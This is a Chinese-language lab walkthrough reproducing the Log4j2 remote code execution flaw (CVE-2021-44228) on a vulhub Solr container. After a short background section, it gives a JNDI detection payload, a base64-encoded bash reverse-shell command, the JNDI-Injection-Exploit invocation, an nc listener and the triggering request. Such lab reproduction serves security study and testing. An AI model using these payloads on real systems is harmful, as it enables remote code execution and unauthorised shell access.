Log4j2:CVE-2021-44228漏洞复现
简介
Apache Log4j2是一款优秀的Java日志框架。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。
2021年12月10日,阿里云安全团队发现 Apache Log4j 2.15.0-rc1 版本存在漏洞绕过
2021年12月15日,Apache 官方发布Log4j 2.16.0 以及 2.12.2 版本,修复 CVE-2021-45046 Apache Log4j 拒绝服务漏洞
2021年12月17日,Apache 官方将 CVE-2021-45046 漏洞 CVSS 评分从 3.7 分上调到 9.0 分
阿里云应急响应中心提醒 Apache Log4j2 用户尽快采取安全措施阻止漏洞攻击。
影响版本
Apache Log4j 2.x <= 2.14.1
靶场搭建
cd vulhub/log4j/CVE-2021-44228 docker-compose up -d
漏洞复现
目标url:http://0.0.0.0:8983/solr/admin/cores?action= 漏洞检测:http://192.168.1.144:8983/solr/admin/cores?action=${jndi:ldap://hbkkb0.dnslog.cn} 漏洞利用 下载JDNI注入工具:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0 构造payload:echo "bash -i > /dev/tcp/192.168.1.144/6969 0>&1"|openssl base64 得到:YmFzaCAtaSA+IC9kZXYvdGNwLzE5Mi4xNjguMS4xNDQvNjk2OSAwPiYxCg== kali执行:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c " {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE5Mi4xNjguMS4xNDQvNjk2OSAwPiYxCg==}|{base64,-d}|{bash,-i}" -A 192.168.1.144
在攻击机器进行监听:nc -lvnp 6969 浏览器输入:http://0.0.0.0:8983/solr/admin/cores?action=${jndi:rmi://192.168.1.144:1099/jfgzgf} 成功复现